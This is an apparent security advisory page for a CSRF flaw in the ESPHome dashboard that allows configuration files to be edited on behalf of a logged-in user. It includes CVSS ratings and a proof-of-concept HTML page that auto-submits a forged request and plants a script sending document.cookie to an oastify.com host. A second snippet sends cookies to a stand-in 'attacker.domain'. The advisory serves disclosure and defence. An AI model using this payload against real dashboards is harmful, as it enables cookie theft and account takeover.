Lucene search

K
osvGoogleOSV:GHSA-5925-88XH-6H99
HistoryMar 21, 2024 - 4:26 p.m.

ESPHome vulnerable to Authentication bypass via Cross site request forgery

2024-03-2116:26:35
Google
osv.dev
6
esphome
cross-site request forgery
dashboard
configuration files

8.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

6.6 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

9.0%

Summary

API endpoints in dashboard component of ESPHome version 2023.12.9 (command line installation) are vulnerable to Cross-Site Request Forgery (CSRF) allowing remote attackers to carry out attacks against a logged user of the dashboard to perform operations on configuration files (create, edit, delete).

Details

It is possible for a malicious actor to create a specifically crafted web page that triggers a cross site request against ESPHome, this allows bypassing the authentication for API calls on the platform.

PoC

An example of malicious web page that abuses this vulnerability:

<html>
<body>
<form action=“http://localhost:6052/edit?configuration=poc.yaml” id=“#main” method=“POST” enctype=“text/plain” onsubmit=“setTimeout(function () { window.location.reload(); }, 10)”>
<input type=“hidden” name=“<script> fetch('https://907zv9yp9u3rjerkiakydpvcr3xulk99.oastify.com?x” value="y', { method: 'POST', mode: 'no-cors', body:document.cookie }); </script> " />
</form>

&lt;script&gt;
document.forms[0].submit();
&lt;/script&gt;

&lt;script&gt;
&lt;/script&gt;

</body>
</html>

In which an attacker creates and weaponizes “poc.yaml” config file containing a cookie exfiltration script and forces the payload triggering visiting the vulnerable page.

Example of such script:
<script>
fetch(‘https://attacker.domain’, {
method: ‘POST’,
mode: ‘no-cors’,
body:document.cookie
});
</script>

Impact

This vulnerability allows bypassing authentication on API calls accessing configuration file operations on the behalf of a logged user. In order to trigger the vulnerability, the victim must visit a weaponized page.

In addition to this, it is possible to chain this vulnerability with GHSA-9p43-hj5j-96h5 (as seen in the PoC) to obtain a complete takeover of the user account.

8.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

6.6 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

9.0%

Related for OSV:GHSA-5925-88XH-6H99